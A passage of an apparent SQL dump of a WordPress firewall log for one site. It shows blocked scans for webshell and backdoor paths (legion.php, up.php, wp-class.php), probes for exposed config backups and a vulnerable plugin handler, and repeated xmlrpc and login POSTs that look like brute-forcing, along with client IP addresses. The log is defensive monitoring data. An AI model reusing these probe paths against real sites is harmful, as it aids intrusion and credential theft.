Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5RIEUCykFB7z9mhSjuq2wtao',0,1664642877.7330,310,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','br6zpFdl3tBCX25NvLAKGjTJ',0,1664642889.0123,322,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XsIDCriWp7v3FaqMNRhz0bYO',0,1664642897.7218,326,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Dlc9kd6X8WEbBanq4suxih3J',0,1664642900.7986,307,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AC9yJmQv486qXI0DlWwSzuYo',0,1664642905.2535,2472,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UdA0h4fPp7Rk68ZcKnoC5GQE',0,1664642912.2635,357,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4S1jHsiVMLd6D8hlOX3n0Rf7',0,1664642921.9169,300,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','t8OhjANl5ILBvua4Hr79YPU3',0,1664642925.8669,328,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nuFfjvl9y8Pk4o7xXbMZ5DgT',0,1664642929.7645,338,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1uwS0zxbHf7Y54anWCkolTg2',0,1664642931.7156,319,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','V6E7iW5T1SendPcahuqm3Q4D',0,1664642943.1281,307,'','POST',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kz3AQCg1mFKYwixWqo54PEUs',0,1664642944.9740,337,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2weAFSToLWp5KGOvZaYgDyqk',0,1664642946.9489,311,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JDjcd9yQxtV0pZbGfg4T23ar',0,1664642953.2693,321,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yI3rdVKaFPXfQp0mhYgEwtNM',0,1664642964.1414,377,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zbEetuYDspmVciXFwjB8AfqI',0,1664642966.8995,348,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jfEtod72nXDpOPTYRz4G8CeS',0,1664642970.2157,302,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YJDpEA6UhIPXRTtjQ5H403BM',0,1664642977.8379,308,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bPextvlpNVQJKrIMTiZwhBYs',0,1664642981.4232,344,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FUveWSDZupqL8g47zR26h0cC',0,1664642984.0207,293,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','V3C7oMbe0gkRcindtYvKxGFm',0,1664642986.3909,336,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hFiB6NtZVeOk7nEpTsWQ4xlq',0,1664642989.0229,305,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','W3285TXaqvf6JRNPon47ULxe',0,1664642993.6144,413,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jAVYhZnt6EBw8pIvl5FzPCsX',0,1664642996.0444,369,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l1zOfNIQkvsU754yVbaigMRB',0,1664642998.3409,303,'','GET',403,0,700,0,1,'',0),('116.203.131.1',1959494401,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','juRWvp5XcSaNUCBQAmtGho8i',0,1664643005.1860,354,'','GET',403,0,700,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ulzQZ2IU8OpK1N5PgRDvAs4h',0,1664643133.4038,2294,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qV3zZPL0aDGYhkSipNI6jwQK',0,1664643358.5328,1278,'','POST',403,0,515,0,1,'',0),('38.242.205.84',653446484,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ebiyE2L1nKwIqYl0hGHPMRjo',0,1664644909.0646,12617,'','POST',403,0,515,0,1,'',0),('125.227.29.249',2112036345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PeczZ7JXf9wgutjndTUi06yE',0,1664645177.0526,7062,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1sbzxwLoS03VOFtNUQGvj8ha',0,1664645933.5131,18555,'','POST',403,0,515,0,1,'',0),('87.106.229.31',1466623263,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JI73xyPjfn458HYXCgpkqruN',0,1664646213.3403,18348,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jHPKkhe9SNumlg2DM1WBOUIb',0,1664646446.6411,18427,'','POST',403,0,515,0,1,'',0),('45.149.77.114',764759410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bJudOcTLPZDmGSfYgq6C7XH2',0,1664646981.2476,3688,'','POST',403,0,515,0,1,'',0),('205.185.116.162',3451483298,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8d03sZUNO6wyuJYamkjqRfbM',0,1664647041.7302,9467,'','POST',403,0,600,0,1,'',0),('192.190.221.75',3233733963,'','http://cteisys.com///installer.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','3jVf2oT4ry1etZ0HzpOUgMI8',0,1664647397.4568,11942,'','GET',403,0,700,0,1,'',0),('192.190.221.75',3233733963,'','http://cteisys.com///installer-backup.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Bd8Z2UMAshDbJVEaf9K3IwgH',0,1664647410.1299,288,'','GET',403,0,700,0,1,'',0),('192.190.221.75',3233733963,'','http://cteisys.com///dup-installer/main.installer.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','k3AUb72ZEOrNyujRxI0sYKQF',0,1664647411.2233,291,'','GET',403,0,700,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4c2sGBUYmzqOKxJfnIAhjwPF',0,1664648493.3558,18902,'','POST',403,0,515,0,1,'',0),('176.9.41.169',2953390505,'','http://www.cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6Nhsx285MWVrZ94Eq3cBfRdI',0,1664648776.9035,11781,'','GET',403,0,700,0,1,'',0),('176.9.41.169',2953390505,'','https://www.cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2h8AE3ezCNJRxou0fmQa16sv',0,1664648790.6392,1219,'','GET',403,0,700,0,1,'',0),('162.240.216.162',2733693090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QiMHz6f5rnDbq2lvu3BNawSX',0,1664649036.5074,20334,'','POST',403,0,515,0,1,'',0),('111.223.36.152',1876894872,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BParpn7XdUMhGtjuLNA9Il0i',0,1664649299.8983,18233,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JnpE278MgLCWaRGhDt4QemU6',0,1664649545.7387,12868,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xJshuDWOca9CN2AyHdtRQEYr',0,1664649833.7651,2253,'','POST',403,0,515,0,1,'',0),('67.222.131.158',1138656158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tOlmQynDfvArY3skXbPaBEMU',0,1664650053.2374,1508,'','POST',403,0,515,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sgtayrY920uEG7KhnAmoVeTM',0,1664650586.9106,2273,'','POST',403,0,515,0,1,'',0),('176.9.41.169',2953390505,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gYULaymJP2rRBlOVZFnH5joA',0,1664651101.6211,9979,'','GET',403,0,700,0,1,'',0),('176.9.41.169',2953390505,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gHANjY48cSJduTpLBDePOWXn',0,1664651115.2611,1725,'','GET',403,0,700,0,1,'',0),('54.38.44.6',908471302,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BNUAkOxTpFI3goWueLirz9ES',0,1664651407.1863,18320,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZInP8ERvsxzuK3DWrhaFQq16',0,1664651645.5285,5045,'','POST',403,0,515,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','C3lX71itIHYdQ0gy2fkZsoeA',0,1664651928.3245,18576,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','l7soJPgEz0LjapQMtnk3d5Uw',0,1664652190.1583,19467,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ozG03btUSLNEFTZwXfnJaeru',0,1664652478.6289,8039,'','POST',403,0,515,0,1,'',0),('184.154.69.85',3097118037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4sRgQhI9a5mzx7HeSucpTvPW',0,1664652712.7059,1645,'','POST',403,0,515,0,1,'',0),('123.56.59.9',2067282697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aR2q4uUvIclbmQeMTwEYGSVk',0,1664653027.3643,17713,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PAVbZSg25z1UWQweq0tpDf8r',0,1664653557.5533,14927,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KLOoG4FvxNpyHtIks3Pdf8Th',0,1664653773.6802,1339,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KcG5FvCXbWEZJalqASBO64DT',0,1664654074.7741,1350,'','POST',403,0,515,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RC0tOUVN6v2I4iMQmr3B8nWy',0,1664654308.5003,1419,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MuE2oSfNZtl0diRDYahGHKzk',0,1664655408.4733,19523,'','POST',403,0,515,0,1,'',0),('20.39.240.246',338161910,'','http://cteisys.com/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xRGwBZ3s9OYUEVy2d6C8DISp',0,1664655789.6310,363,'','GET',403,0,700,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oEFqMhKV8GbpBrIjxSJRD4zC',0,1664655933.6803,1357,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SkJOwHK7jIb5cT1GyPNWdgaX',0,1664656119.3951,1432,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LkHZDNChtg1xVyBni04GzApe',0,1664656369.1105,1957,'','POST',403,0,515,0,1,'',0),('46.229.214.93',786814557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cefSMXbpZx48iv3KqFl71GID',0,1664656924.1161,4660,'','POST',403,0,515,0,1,'',0),('111.223.36.152',1876894872,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3DGoRAmkKf4vcujibgwya1E5',0,1664657201.9004,1169,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s6p3zDXB1dKHWi9mbCaYNSj8',0,1664657458.1798,2271,'','POST',403,0,515,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bZ8hrCafJjKP3OFx25LyAHdI',0,1664657767.9603,18375,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wP9KV3oLl5tu2bEC0vn6YFOa',0,1664657987.6890,2353,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F80qvjfs4UyDrNWnP7Q9Yce6',0,1664659417.2926,19445,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K7x3fFA29OwpimCPkDXrIH4j',0,1664659655.1223,18472,'','POST',403,0,515,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','5wQUPs3C4Hdft2uhaDKmTMV1',0,1664659775.9812,518,'','POST',403,0,600,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZCgYTd5Q4W32FIAmoq1HfBsR',0,1664660204.5003,19886,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','DHZRn17ScGWjdguECrUvOqIX',0,1664660421.7109,2690,'','POST',403,0,600,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XdclhLDANbHpYvnPtjV1xTUg',0,1664660494.1303,2885,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g3OwmUWFSzA7K8XG2ID4o5Jt',0,1664660757.0973,18485,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wCuSYPnfe12lts08UcEMJxK9',0,1664661066.5372,18270,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','ocY2CbAn3sgmkB6JhlLNzO9H',0,1664661203.9753,1604,'','POST',403,0,600,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gWiu3rJoKesaqDXv59hk1xYI',0,1664661298.0178,2420,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LK3QO67DsaiHXRxZSlrYoyPb',0,1664663525.7067,18890,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ArqKtQi6f4n1NoUB7XRej2H5',0,1664664085.7430,3756,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G8mb7HcQg1LWt6SNeIsRrl5F',0,1664664403.5230,1442,'','POST',403,0,515,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e4XYJt2KFDRl0O7bui3sHzf9',0,1664664632.9698,1386,'','POST',403,0,515,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 